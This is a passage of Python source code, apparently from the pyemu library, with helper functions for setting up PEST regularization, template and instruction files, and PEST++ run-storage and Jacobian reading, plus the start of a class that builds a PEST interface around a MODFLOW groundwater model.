"obgnme": obgnme,
"weight": weight})
pst.prior_information = pst.prior_information.append(pi)
if parbounds:
_regweight_from_parbound(pst)
if pst.control_data.pestmode == "estimation":
pst.control_data.pestmode = "regularization"
def _regweight_from_parbound(pst):
"""sets regularization weights from parameter bounds
which approximates the KL expansion. Called by
zero_order_tikhonov().
"""
pst.parameter_data.index = pst.parameter_data.parnme
pst.prior_information.index = pst.prior_information.pilbl
for idx, parnme in enumerate(pst.prior_information.pilbl):
if parnme in pst.parameter_data.index:
row = pst.parameter_data.loc[parnme, :]
lbnd, ubnd = row["parlbnd"], row["parubnd"]
if row["partrans"].lower() == "log":
weight = 1.0 / (np.log10(ubnd) - np.log10(lbnd))
else:
weight = 1.0 / (ubnd - lbnd)
pst.prior_information.loc[parnme, "weight"] = weight
else:
print("prior information name does not correspond" + \
" to a parameter: " + str(parnme))
def first_order_pearson_tikhonov(pst, cov, reset=True, abs_drop_tol=1.0e-3):
"""setup preferred-difference regularization from a covariance matrix.
Args:
pst (`pyemu.Pst`): the PEST control file
cov (`pyemu.Cov`): a covariance matrix instance with
some or all of the parameters listed in `pst`.
reset (`bool`): a flag to remove any existing prior information equations
in the control file. Default is True
abs_drop_tol (`float`, optional): tolerance to control how many pi equations
are written. If the absolute value of the Pearson CC is less than
abs_drop_tol, the prior information equation will not be included in
the control file.
Note:
The weights on the prior information equations are the Pearson
correlation coefficients implied by covariance matrix.
Example::
pst = pyemu.Pst("my.pst")
cov = pyemu.Cov.from_ascii("my.cov")
pyemu.helpers.first_order_pearson_tikhonov(pst,cov)
pst.write("my_reg.pst")
"""
assert isinstance(cov, pyemu.Cov)
print("getting CC matrix")
cc_mat = cov.to_pearson()
# print(pst.parameter_data.dtypes)
try:
ptrans = pst.parameter_data.partrans.apply(lambda x: x.decode()).to_dict()
except:
ptrans = pst.parameter_data.partrans.to_dict()
pi_num = pst.prior_information.shape[0] + 1
pilbl, obgnme, weight, equation = [], [], [], []
sadj_names = set(pst.adj_par_names)
print("processing")
for i, iname in enumerate(cc_mat.row_names):
if iname not in sadj_names:
continue
for j, jname in enumerate(cc_mat.row_names[i + 1:]):
if jname not in sadj_names:
continue
# print(i,iname,i+j+1,jname)
cc = cc_mat.x[i, j + i + 1]
if cc < abs_drop_tol:
continue
pilbl.append("pcc_{0}".format(pi_num))
iiname = str(iname)
if str(ptrans[iname]) == "log":
iiname = "log(" + iname + ")"
jjname = str(jname)
if str(ptrans[jname]) == "log":
jjname = "log(" + jname + ")"
equation.append("1.0 * {0} - 1.0 * {1} = 0.0". \
format(iiname, jjname))
weight.append(cc)
obgnme.append("regul_cc")
pi_num += 1
df = pd.DataFrame({"pilbl": pilbl, "equation": equation,
"obgnme": obgnme, "weight": weight})
df.index = df.pilbl
if reset:
pst.prior_information = df
else:
pst.prior_information = pst.prior_information.append(df)
if pst.control_data.pestmode == "estimation":
pst.control_data.pestmode = "regularization"
def simple_tpl_from_pars(parnames, tplfilename='model.input.tpl'):
"""Make a simple template file from a list of parameter names.
Args:
parnames ([`str`]): list of parameter names to put in the
new template file
tplfilename (`str`): Name of the template file to create. Default
is "model.input.tpl"
Note:
writes a file `tplfilename` with each parameter name in `parnames` on a line
"""
with open(tplfilename, 'w') as ofp:
ofp.write('ptf ~\n')
[ofp.write('~{0:^12}~\n'.format(cname)) for cname in parnames]
def simple_ins_from_obs(obsnames, insfilename='model.output.ins'):
"""write a simple instruction file that reads the values named
in obsnames in order, one per line from a model output file
Args:
obsnames (`str`): list of observation names to put in the
new instruction file
insfilename (`str`): the name of the instruction file to
create. Default is "model.output.ins"
Note:
writes a file `insfilename` with each observation read off
of a single line
"""
with open(insfilename, 'w') as ofp:
ofp.write('pif ~\n')
[ofp.write('!{0}!\n'.format(cob)) for cob in obsnames]
def pst_from_parnames_obsnames(parnames, obsnames,
tplfilename='model.input.tpl', insfilename='model.output.ins'):
"""Creates a Pst object from a list of parameter names and a list of observation names.
Args:
parnames (`str`): list of parameter names
obsnames (`str`): list of observation names
tplfilename (`str`): template filename. Default is "model.input.tpl"
insfilename (`str`): instruction filename. Default is "model.output.ins"
Returns:
`pyemu.Pst`: the generic control file
"""
simple_tpl_from_pars(parnames, tplfilename)
simple_ins_from_obs(obsnames, insfilename)
modelinputfilename = tplfilename.replace('.tpl', '')
modeloutputfilename = insfilename.replace('.ins', '')
return pyemu.Pst.from_io_files(tplfilename, modelinputfilename, insfilename, modeloutputfilename)
def read_pestpp_runstorage(filename, irun=0, with_metadata=False):
"""read pars and obs from a specific run in a pest++ serialized
run storage file into dataframes.
Args:
filename (`str`): the name of the run storage file
irun (`int`): the run id to process. If 'all', then all runs are
read. Default is 0
with_metadata (`bool`): flag to return run stats and info txt as well
Returns:
tuple containing
- **pandas.DataFrame**: parameter information
- **pandas.DataFrame**: observation information
- **pandas.DataFrame**: optionally run status and info txt.
"""
header_dtype = np.dtype([("n_runs", np.int64), ("run_size", np.int64), ("p_name_size", np.int64),
("o_name_size", np.int64)])
try:
irun = int(irun)
except:
if irun.lower() == "all":
irun = irun.lower()
else:
raise Exception("unrecognized 'irun': should be int or 'all', not '{0}'".
format(irun))
def status_str(r_status):
if r_status == 0:
return "not completed"
if r_status == 1:
return "completed"
if r_status == -100:
return "canceled"
else:
return "failed"
assert os.path.exists(filename)
f = open(filename, "rb")
header = np.fromfile(f, dtype=header_dtype, count=1)
p_name_size, o_name_size = header["p_name_size"][0], header["o_name_size"][0]
par_names = struct.unpack('{0}s'.format(p_name_size),
f.read(p_name_size))[0].strip().lower().decode().split('\0')[:-1]
obs_names = struct.unpack('{0}s'.format(o_name_size),
f.read(o_name_size))[0].strip().lower().decode().split('\0')[:-1]
n_runs, run_size = header["n_runs"][0], header["run_size"][0]
run_start = f.tell()
def _read_run(irun):
f.seek(run_start + (irun * run_size))
r_status = np.fromfile(f, dtype=np.int8, count=1)
info_txt = struct.unpack("41s", f.read(41))[0].strip().lower().decode()
par_vals = np.fromfile(f, dtype=np.float64, count=len(par_names) + 1)[1:]
obs_vals = np.fromfile(f, dtype=np.float64, count=len(obs_names) + 1)[:-1]
par_df = pd.DataFrame({"parnme": par_names, "parval1": par_vals})
par_df.index = par_df.pop("parnme")
obs_df = pd.DataFrame({"obsnme": obs_names, "obsval": obs_vals})
obs_df.index = obs_df.pop("obsnme")
return r_status, info_txt, par_df, obs_df
if irun == "all":
par_dfs, obs_dfs = [], []
r_stats, txts = [], []
for irun in range(n_runs):
# print(irun)
r_status, info_txt, par_df, obs_df = _read_run(irun)
par_dfs.append(par_df)
obs_dfs.append(obs_df)
r_stats.append(r_status)
txts.append(info_txt)
par_df = pd.concat(par_dfs, axis=1).T
par_df.index = np.arange(n_runs)
obs_df = pd.concat(obs_dfs, axis=1).T
obs_df.index = np.arange(n_runs)
meta_data = pd.DataFrame({"r_status": r_stats, "info_txt": txts})
meta_data.loc[:, "status"] = meta_data.r_status.apply(status_str)
else:
assert irun <= n_runs
r_status, info_txt, par_df, obs_df = _read_run(irun)
meta_data = pd.DataFrame({"r_status": [r_status], "info_txt": [info_txt]})
meta_data.loc[:, "status"] = meta_data.r_status.apply(status_str)
f.close()
if with_metadata:
return par_df, obs_df, meta_data
else:
return par_df, obs_df
def jco_from_pestpp_runstorage(rnj_filename, pst_filename):
""" read pars and obs from a pest++ serialized run storage
file (e.g., .rnj) and return jacobian matrix instance
Args:
rnj_filename (`str`): the name of the run storage file
pst_filename (`str`): the name of the pst file
Note:
This can then be passed to Jco.to_binary or Jco.to_coo, etc., to write jco
file in a subsequent step to avoid memory resource issues associated
with very large problems.
Returns:
`pyemu.Jco`: a jacobian matrix constructed from the run results and
pest control file information.
TODO:
Check rnj file contains transformed par vals (i.e., in model input space)
Currently only returns pyemu.Jco; doesn't write jco file due to memory
issues associated with very large problems
Compare rnj and jco from Freyberg problem in autotests
"""
header_dtype = np.dtype([("n_runs", np.int64), ("run_size", np.int64), ("p_name_size", np.int64),
("o_name_size", np.int64)])
pst = pyemu.Pst(pst_filename)
par = pst.parameter_data
log_pars = set(par.loc[par.partrans == "log", "parnme"].values)
with open(rnj_filename, 'rb') as f:
header = np.fromfile(f, dtype=header_dtype, count=1)
try:
base_par, base_obs = read_pestpp_runstorage(rnj_filename, irun=0)
except:
raise Exception("couldn't get base run...")
par = par.loc[base_par.index, :]
li = base_par.index.map(lambda x: par.loc[x, "partrans"] == "log")
base_par.loc[li] = base_par.loc[li].apply(np.log10)
jco_cols = {}
for irun in range(1, int(header["n_runs"])):
par_df, obs_df = read_pestpp_runstorage(rnj_filename, irun=irun)
par_df.loc[li] = par_df.loc[li].apply(np.log10)
obs_diff = base_obs - obs_df
par_diff = base_par - par_df
# check only one non-zero element per col(par)
if len(par_diff[par_diff.parval1 != 0]) > 1:
raise Exception("more than one par diff - looks like the file wasn't created during jco filling...")
parnme = par_diff[par_diff.parval1 != 0].index[0]
parval = par_diff.parval1.loc[parnme]
# derivatives
jco_col = obs_diff / parval
# some tracking, checks
print("processing par {0}: {1}...".format(irun, parnme))
print("%nzsens: {0}%...".format((jco_col[abs(jco_col.obsval) > 1e-8].shape[0] / jco_col.shape[0]) * 100.))
jco_cols[parnme] = jco_col.obsval
jco_cols = pd.DataFrame.from_records(data=jco_cols, index=list(obs_diff.index.values))
jco_cols = pyemu.Jco.from_dataframe(jco_cols)
# write # memory considerations important here for very large matrices - break into chunks...
# jco_fnam = "{0}".format(filename[:-4]+".jco")
# jco_cols.to_binary(filename=jco_fnam, droptol=None, chunk=None)
return jco_cols
def parse_dir_for_io_files(d,prepend_path=False):
""" find template/input file pairs and instruction file/output file
pairs by extension.
Args:
d (`str`): directory to search for interface files
prepend_path (`bool, optional): flag to prepend `d` to each file name.
Default is False
Note:
the return values from this function can be passed straight to
`pyemu.Pst.from_io_files()` classmethod constructor. Assumes the
template file names are <input_file>.tpl and instruction file names
are <output_file>.ins.
Returns:
tuple containing
- **[`str`]**: list of template files in d
- **[`str`]**: list of input files in d
- **[`str`]**: list of instruction files in d
- **[`str`]**: list of output files in d
"""
files = os.listdir(d)
tpl_files = [f for f in files if f.endswith(".tpl")]
in_files = [f.replace(".tpl", "") for f in tpl_files]
ins_files = [f for f in files if f.endswith(".ins")]
out_files = [f.replace(".ins", "") for f in ins_files]
if prepend_path:
tpl_files = [os.path.join(d,item) for item in tpl_files]
in_files = [os.path.join(d, item) for item in in_files]
ins_files = [os.path.join(d, item) for item in ins_files]
out_files = [os.path.join(d, item) for item in out_files]
return tpl_files, in_files, ins_files, out_files
def pst_from_io_files(tpl_files, in_files, ins_files, out_files,
pst_filename=None, pst_path=None):
""" create a Pst instance from model interface files.
Args:
tpl_files ([`str`]): list of template file names
in_files ([`str`]): list of model input file names (pairs with template files)
ins_files ([`str`]): list of instruction file names
out_files ([`str`]): list of model output file names (pairs with instruction files)
pst_filename (`str`): name of control file to write. If None, no file is written.
Default is None
pst_path (`str`): the path to append to the template_file and in_file in the control file. If
not None, then any existing path in front of the template or in file is split off
and pst_path is prepended. If python is being run in a directory other than where the control
file will reside, it is useful to pass `pst_path` as `.`. Default is None
Returns:
`Pst`: new control file instance with parameter and observation names
found in `tpl_files` and `ins_files`, repsectively.
Note:
calls `pyemu.helpers.pst_from_io_files()`
Assigns generic values for parameter info. Tries to use INSCHEK
to set somewhat meaningful observation values
all file paths are relatively to where python is running.
TODO:
add pst_path option
make in_files and out_files optional
Example::
tpl_files = ["my.tpl"]
in_files = ["my.in"]
ins_files = ["my.ins"]
out_files = ["my.out"]
pst = pyemu.Pst.from_io_files(tpl_files,in_files,ins_files,out_files)
pst.control_data.noptmax = 0
pst.write("my.pst)
"""
par_names = set()
if not isinstance(tpl_files, list):
tpl_files = [tpl_files]
if not isinstance(in_files, list):
in_files = [in_files]
assert len(in_files) == len(tpl_files), "len(in_files) != len(tpl_files)"
for tpl_file in tpl_files:
assert os.path.exists(tpl_file), "template file not found: " + str(tpl_file)
# new_names = [name for name in pyemu.pst_utils.parse_tpl_file(tpl_file) if name not in par_names]
# par_names.extend(new_names)
new_names = pyemu.pst_utils.parse_tpl_file(tpl_file)
par_names.update(new_names)
if not isinstance(ins_files, list):
ins_files = [ins_files]
if not isinstance(out_files, list):
out_files = [out_files]
assert len(ins_files) == len(out_files), "len(out_files) != len(out_files)"
obs_names = []
for ins_file in ins_files:
assert os.path.exists(ins_file), "instruction file not found: " + str(ins_file)
obs_names.extend(pyemu.pst_utils.parse_ins_file(ins_file))
new_pst = pyemu.pst_utils.generic_pst(list(par_names), list(obs_names))
if "window" in platform.platform().lower() and pst_path == ".":
pst_path = ''
new_pst.instruction_files = ins_files
new_pst.output_files = out_files
# try to run inschek to find the observtion values
pyemu.pst_utils.try_process_output_pst(new_pst)
if pst_path is None:
new_pst.template_files = tpl_files
new_pst.input_files = in_files
else:
new_pst.template_files = [os.path.join(
pst_path, os.path.split(tpl_file)[-1]) for tpl_file in tpl_files]
new_pst.input_files = [os.path.join(
pst_path, os.path.split(in_file)[-1]) for in_file in in_files]
# now set the true path location to instruction files and output files
new_pst.instruction_files = [os.path.join(
pst_path, os.path.split(ins_file)[-1]) for ins_file in ins_files]
new_pst.output_files = [os.path.join(
pst_path, os.path.split(out_file)[-1]) for out_file in out_files]
new_pst.try_parse_name_metadata()
if pst_filename:
new_pst.write(pst_filename)
return new_pst
wildass_guess_par_bounds_dict = {"hk": [0.01, 100.0], "vka": [0.1, 10.0],
"sy": [0.25, 1.75], "ss": [0.1, 10.0],
"cond": [0.01, 100.0], "flux": [0.25, 1.75],
"rech": [0.9, 1.1], "stage": [0.9, 1.1],
}
class PstFromFlopyModel(object):
""" a monster helper class to setup a complex PEST interface around
an existing MODFLOW-2005-family model.
Args:
model (`flopy.mbase`): a loaded flopy model instance. If model is an str, it is treated as a
MODFLOW nam file (requires org_model_ws)
new_model_ws (`str`): a directory where the new version of MODFLOW input files and PEST(++)
files will be written
org_model_ws (`str`): directory to existing MODFLOW model files. Required if model argument
is an str. Default is None
pp_props ([[`str`,[`int`]]]): pilot point multiplier parameters for grid-based properties.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices. For example, ["lpf.hk",[0,1,2,]] would setup pilot point multiplier
parameters for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3. For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup pilot point multiplier parameters for recharge for stress
period 1,5,11,and 16.
const_props ([[`str`,[`int`]]]): constant (uniform) multiplier parameters for grid-based properties.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices. For example, ["lpf.hk",[0,1,2,]] would setup constant (uniform) multiplier
parameters for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3. For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup constant (uniform) multiplier parameters for recharge for stress
period 1,5,11,and 16.
temporal_list_props ([[`str`,[`int`]]]): list-type input stress-period level multiplier parameters.
A nested list of list-type input elements to parameterize using
name, iterable pairs. The iterable is zero-based stress-period indices.
For example, to setup multipliers for WEL flux and for RIV conductance,
temporal_list_props = [["wel.flux",[0,1,2]],["riv.cond",None]] would setup
multiplier parameters for well flux for stress periods 1,2 and 3 and
would setup one single river conductance multiplier parameter that is applied
to all stress periods
spatial_list_props ([[`str`,[`int`]]]): list-type input for spatial multiplier parameters.
A nested list of list-type elements to parameterize using
names (e.g. [["riv.cond",0],["wel.flux",1] to setup up cell-based parameters for
each list-type element listed. These multiplier parameters are applied across
all stress periods. For this to work, there must be the same number of entries
for all stress periods. If more than one list element of the same type is in a single
cell, only one parameter is used to multiply all lists in the same cell.
grid_props ([[`str`,[`int`]]]): grid-based (every active model cell) multiplier parameters.
A nested list of grid-scale model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3 in every active model cell). For time-varying properties (e.g. recharge), the
iterable is for zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup grid-based multiplier parameters in every active model cell
for recharge for stress period 1,5,11,and 16.
sfr_pars (`bool`): setup parameters for the stream flow routing modflow package.
If list is passed it defines the parameters to set up.
sfr_temporal_pars (`bool`)
flag to include stress-period level spatially-global multipler parameters in addition to
the spatially-discrete `sfr_pars`. Requires `sfr_pars` to be passed. Default is False
grid_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to build the prior parameter covariance matrix
elements for grid-based parameters. If None, a generic GeoStruct is created
using an "a" parameter that is 10 times the max cell size. Default is None
pp_space (`int`): number of grid cells between pilot points. If None, use the default
in pyemu.pp_utils.setup_pilot_points_grid. Default is None
zone_props ([[`str`,[`int`]]]): zone-based multiplier parameters.
A nested list of zone-based model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3 for unique zone values in the ibound array.
For time-varying properties (e.g. recharge), the iterable is for
zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup zone-based multiplier parameters for recharge for stress
period 1,5,11,and 16.
pp_geostruct (`pyemu.geostats.GeoStruct`): the geostatistical structure to use for building the prior parameter
covariance matrix for pilot point parameters. If None, a generic
GeoStruct is created using pp_space and grid-spacing information.
Default is None
par_bounds_dict (`dict`): a dictionary of model property/boundary condition name, upper-lower bound pairs.
For example, par_bounds_dict = {"hk":[0.01,100.0],"flux":[0.5,2.0]} would
set the bounds for horizontal hydraulic conductivity to
0.001 and 100.0 and set the bounds for flux parameters to 0.5 and
2.0. For parameters not found in par_bounds_dict,
`pyemu.helpers.wildass_guess_par_bounds_dict` is
used to set somewhat meaningful bounds. Default is None
temporal_list_geostruct (`pyemu.geostats.GeoStruct`): the geostastical struture to
build the prior parameter covariance matrix
for time-varying list-type multiplier parameters. This GeoStruct
express the time correlation so that the 'a' parameter is the length of
time that boundary condition multiplier parameters are correlated across.
If None, then a generic GeoStruct is created that uses an 'a' parameter
of 3 stress periods. Default is None
spatial_list_geostruct (`pyemu.geostats.GeoStruct`): the geostastical struture to
build the prior parameter covariance matrix
for spatially-varying list-type multiplier parameters.
If None, a generic GeoStruct is created using an "a" parameter that
is 10 times the max cell size. Default is None.
remove_existing (`bool`): a flag to remove an existing new_model_ws directory. If False and
new_model_ws exists, an exception is raised. If True and new_model_ws
exists, the directory is destroyed - user beware! Default is False.
k_zone_dict (`dict`): a dictionary of zero-based layer index, zone array pairs.
e.g. {lay: np.2darray} Used to
override using ibound zones for zone-based parameterization. If None,
use ibound values greater than zero as zones. Alternatively a dictionary of dictionaries
can be passed to allow different zones to be defined for different parameters.
e.g. {"upw.hk" {lay: np.2darray}, "extra.rc11" {lay: np.2darray}}
or {"hk" {lay: np.2darray}, "rc11" {lay: np.2darray}}
use_pp_zones (`bool`): a flag to use ibound zones (or k_zone_dict, see above) as pilot
point zones. If False, ibound values greater than zero are treated as
a single zone for pilot points. Default is False
obssim_smp_pairs ([[`str`,`str`]]: a list of observed-simulated PEST-type SMP file
pairs to get observations
from and include in the control file. Default is []
external_tpl_in_pairs ([[`str`,`str`]]: a list of existing template file, model input
file pairs to parse parameters
from and include in the control file. Default is []
external_ins_out_pairs ([[`str`,`str`]]: a list of existing instruction file,
model output file pairs to parse
observations from and include in the control file. Default is []
extra_pre_cmds ([`str`]): a list of preprocessing commands to add to the forward_run.py script
commands are executed with os.system() within forward_run.py. Default is None.
redirect_forward_output (`bool`): flag for whether to redirect forward model output to text files (True) or
allow model output to be directed to the screen (False). Default is True
extra_post_cmds ([`str`]): a list of post-processing commands to add to the forward_run.py script.
Commands are executed with os.system() within forward_run.py. Default is None.
tmp_files ([`str`]): a list of temporary files that should be removed at the start of the forward
run script. Default is [].
model_exe_name (`str`): binary name to run modflow. If None, a default from flopy is used,
which is dangerous because of the non-standard binary names
(e.g. MODFLOW-NWT_x64, MODFLOWNWT, mfnwt, etc). Default is None.
build_prior (`bool`): flag to build prior covariance matrix. Default is True
sfr_obs (`bool`): flag to include observations of flow and aquifer exchange from
the sfr ASCII output file
hfb_pars (`bool`): add HFB parameters. uses pyemu.gw_utils.write_hfb_template(). the resulting
HFB pars have parval1 equal to the values in the original file and use the
spatial_list_geostruct to build geostatistical covariates between parameters
kl_props ([[`str`,[`int`]]]): karhunen-loeve based multiplier parameters.
A nested list of KL-based model properties to parameterize using
name, iterable pairs. For 3D properties, the iterable is zero-based
layer indices (e.g., ["lpf.hk",[0,1,2,]] would setup a multiplier
parameter for layer property file horizontal hydraulic conductivity for model
layers 1,2, and 3 for unique zone values in the ibound array.
For time-varying properties (e.g. recharge), the iterable is for
zero-based stress period indices. For example, ["rch.rech",[0,4,10,15]]
would setup zone-based multiplier parameters for recharge for stress
period 1,5,11,and 16.
kl_num_eig (`int`): the number of KL-based eigenvector multiplier parameters to use for each
KL parameter set. default is 100
kl_geostruct (`pyemu.geostats.Geostruct`): the geostatistical structure
to build the prior parameter covariance matrix
elements for KL-based parameters. If None, a generic GeoStruct is created
using an "a" parameter that is 10 times the max cell size. Default is None
Note:
Setup up multiplier parameters for an existing MODFLOW model.
Does all kinds of coolness like building a
meaningful prior, assigning somewhat meaningful parameter groups and
bounds, writes a forward_run.py script with all the calls need to
implement multiplier parameters, run MODFLOW and post-process.
Works a lot better if TEMPCHEK, INSCHEK and PESTCHEK are available in the
system path variable
"""
def __init__(self, model, new_model_ws, org_model_ws=None, pp_props=[], const_props=[],
temporal_bc_props=[], temporal_list_props=[], grid_props=[],
grid_geostruct=None, pp_space=None,
zone_props=[], pp_geostruct=None, par_bounds_dict=None, sfr_pars=False, temporal_sfr_pars=False,
temporal_list_geostruct=None, remove_existing=False, k_zone_dict=None,
mflist_waterbudget=True, mfhyd=True, hds_kperk=[], use_pp_zones=False,
obssim_smp_pairs=None, external_tpl_in_pairs=None,
external_ins_out_pairs=None, extra_pre_cmds=None,
extra_model_cmds=None, extra_post_cmds=None, redirect_forward_output=True,
tmp_files=None, model_exe_name=None, build_prior=True,
sfr_obs=False,
spatial_bc_props=[], spatial_list_props=[], spatial_list_geostruct=None,
hfb_pars=False, kl_props=None, kl_num_eig=100, kl_geostruct=None):
self.logger = pyemu.logger.Logger("PstFromFlopyModel.log")
self.log = self.logger.log
self.logger.echo = True
self.zn_suffix = "_zn"
self.gr_suffix = "_gr"
self.pp_suffix = "_pp"
self.cn_suffix = "_cn"
self.kl_suffix = "_kl"
self.arr_org = "arr_org"
self.arr_mlt = "arr_mlt"
self.list_org = "list_org"
self.list_mlt = "list_mlt"
self.forward_run_file = "forward_run.py"
self.remove_existing = remove_existing
self.external_tpl_in_pairs = external_tpl_in_pairs
self.external_ins_out_pairs = external_ins_out_pairs
self._setup_model(model, org_model_ws, new_model_ws)
self._add_external()
self.arr_mult_dfs = []
self.par_bounds_dict = par_bounds_dict
self.pp_props = pp_props
self.pp_space = pp_space
self.pp_geostruct = pp_geostruct
self.use_pp_zones = use_pp_zones
self.const_props = const_props
self.grid_props = grid_props
self.grid_geostruct = grid_geostruct
self.zone_props = zone_props
self.kl_props = kl_props
self.kl_geostruct = kl_geostruct
self.kl_num_eig = kl_num_eig
if len(temporal_bc_props) > 0:
if len(temporal_list_props) > 0:
self.logger.lraise("temporal_bc_props and temporal_list_props. " + \
"temporal_bc_props is deprecated and replaced by temporal_list_props")
self.logger.warn("temporal_bc_props is deprecated and replaced by temporal_list_props")
temporal_list_props = temporal_bc_props
if len(spatial_bc_props) > 0:
if len(spatial_list_props) > 0:
self.logger.lraise("spatial_bc_props and spatial_list_props. " + \
"spatial_bc_props is deprecated and replaced by spatial_list_props")
self.logger.warn("spatial_bc_props is deprecated and replaced by spatial_list_props")
spatial_list_props = spatial_bc_props
self.temporal_list_props = temporal_list_props
self.temporal_list_geostruct = temporal_list_geostruct
if self.temporal_list_geostruct is None:
v = pyemu.geostats.ExpVario(contribution=1.0, a=180.0) # 180 correlation length
self.temporal_list_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="temporal_list_geostruct")
self.spatial_list_props = spatial_list_props
self.spatial_list_geostruct = spatial_list_geostruct
if self.spatial_list_geostruct is None:
dist = 10 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=dist)
self.spatial_list_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="spatial_list_geostruct")
self.obssim_smp_pairs = obssim_smp_pairs
self.hds_kperk = hds_kperk
self.sfr_obs = sfr_obs
self.frun_pre_lines = []
self.frun_model_lines = []
self.frun_post_lines = []
self.tmp_files = []
self.extra_forward_imports = []
if tmp_files is not None:
if not isinstance(tmp_files, list):
tmp_files = [tmp_files]
self.tmp_files.extend(tmp_files)
if k_zone_dict is None:
self.k_zone_dict = {k: self.m.bas6.ibound[k].array for k in np.arange(self.m.nlay)}
else:
# check if k_zone_dict is a dictionary of dictionaries
if np.all([isinstance(v, dict) for v in k_zone_dict.values()]):
# loop over outer keys
for par_key in k_zone_dict.keys():
for k, arr in k_zone_dict[par_key].items():
if k not in np.arange(self.m.nlay):
self.logger.lraise("k_zone_dict for par {1}, layer index not in nlay:{0}".
format(k, par_key))
if arr.shape != (self.m.nrow, self.m.ncol):
self.logger.lraise("k_zone_dict arr for k {0} for par{2} has wrong shape:{1}".
format(k, arr.shape, par_key))
else:
for k, arr in k_zone_dict.items():
if k not in np.arange(self.m.nlay):
self.logger.lraise("k_zone_dict layer index not in nlay:{0}".
format(k))
if arr.shape != (self.m.nrow, self.m.ncol):
self.logger.lraise("k_zone_dict arr for k {0} has wrong shape:{1}".
format(k, arr.shape))
self.k_zone_dict = k_zone_dict
# add any extra commands to the forward run lines
for alist, ilist in zip([self.frun_pre_lines, self.frun_model_lines, self.frun_post_lines],
[extra_pre_cmds, extra_model_cmds, extra_post_cmds]):
if ilist is None:
continue
if not isinstance(ilist, list):
ilist = [ilist]
for cmd in ilist:
self.logger.statement("forward_run line:{0}".format(cmd))
alist.append("pyemu.os_utils.run('{0}')\n".format(cmd))
# add the model call
if model_exe_name is None:
model_exe_name = self.m.exe_name
self.logger.warn("using flopy binary to execute the model:{0}".format(model))
if redirect_forward_output:
line = "pyemu.os_utils.run('{0} {1} 1>{1}.stdout 2>{1}.stderr')".format(model_exe_name, self.m.namefile)
else:
line = "pyemu.os_utils.run('{0} {1} ')".format(model_exe_name, self.m.namefile)
self.logger.statement("forward_run line:{0}".format(line))
self.frun_model_lines.append(line)
self.tpl_files, self.in_files = [], []
self.ins_files, self.out_files = [], []
self._setup_mult_dirs()
self.mlt_files = []
self.org_files = []
self.m_files = []
self.mlt_counter = {}
self.par_dfs = {}
self.mlt_dfs = []
self._setup_list_pars()
self._setup_array_pars()
if not sfr_pars and temporal_sfr_pars:
self.logger.lraise("use of `temporal_sfr_pars` requires `sfr_pars`")
if sfr_pars:
if isinstance(sfr_pars, str):
sfr_pars = [sfr_pars]
if isinstance(sfr_pars, list):
self._setup_sfr_pars(sfr_pars, include_temporal_pars=temporal_sfr_pars)
else:
self._setup_sfr_pars(include_temporal_pars=temporal_sfr_pars)
if hfb_pars:
self._setup_hfb_pars()
self.mflist_waterbudget = mflist_waterbudget
self.mfhyd = mfhyd
self._setup_observations()
self.build_pst()
if build_prior:
self.parcov = self.build_prior()
else:
self.parcov = None
self.log("saving intermediate _setup_<> dfs into {0}".
format(self.m.model_ws))
for tag, df in self.par_dfs.items():
df.to_csv(os.path.join(self.m.model_ws, "_setup_par_{0}_{1}.csv".
format(tag.replace(" ", '_'), self.pst_name)))
for tag, df in self.obs_dfs.items():
df.to_csv(os.path.join(self.m.model_ws, "_setup_obs_{0}_{1}.csv".
format(tag.replace(" ", '_'), self.pst_name)))
self.log("saving intermediate _setup_<> dfs into {0}".
format(self.m.model_ws))
self.logger.statement("all done")
def _setup_sfr_obs(self):
"""setup sfr ASCII observations"""
if not self.sfr_obs:
return
if self.m.sfr is None:
self.logger.lraise("no sfr package found...")
org_sfr_out_file = os.path.join(self.org_model_ws, "{0}.sfr.out".format(self.m.name))
if not os.path.exists(org_sfr_out_file):
self.logger.lraise("setup_sfr_obs() error: could not locate existing sfr out file: {0}".
format(org_sfr_out_file))
new_sfr_out_file = os.path.join(self.m.model_ws, os.path.split(org_sfr_out_file)[-1])
shutil.copy2(org_sfr_out_file, new_sfr_out_file)
seg_group_dict = None
if isinstance(self.sfr_obs, dict):
seg_group_dict = self.sfr_obs
df = pyemu.gw_utils.setup_sfr_obs(new_sfr_out_file, seg_group_dict=seg_group_dict,
model=self.m, include_path=True)
if df is not None:
self.obs_dfs["sfr"] = df
self.frun_post_lines.append("pyemu.gw_utils.apply_sfr_obs()")
def _setup_sfr_pars(self, par_cols=None, include_temporal_pars=None):
"""setup multiplier parameters for sfr segment data
Adding support for reachinput (and isfropt = 1)"""
assert self.m.sfr is not None, "can't find sfr package..."
if isinstance(par_cols, str):
par_cols = [par_cols]
reach_pars = False # default to False
seg_pars = True
par_dfs = {}
df = pyemu.gw_utils.setup_sfr_seg_parameters(
self.m, par_cols=par_cols,
include_temporal_pars=include_temporal_pars) # now just pass model
# self.par_dfs["sfr"] = df
if df.empty:
warnings.warn("No sfr segment parameters have been set up", PyemuWarning)
par_dfs["sfr"] = []
seg_pars = False
else:
par_dfs["sfr"] = [df] # may need df for both segs and reaches
self.tpl_files.append("sfr_seg_pars.dat.tpl")
self.in_files.append("sfr_seg_pars.dat")
if include_temporal_pars:
self.tpl_files.append("sfr_seg_temporal_pars.dat.tpl")
self.in_files.append("sfr_seg_temporal_pars.dat")
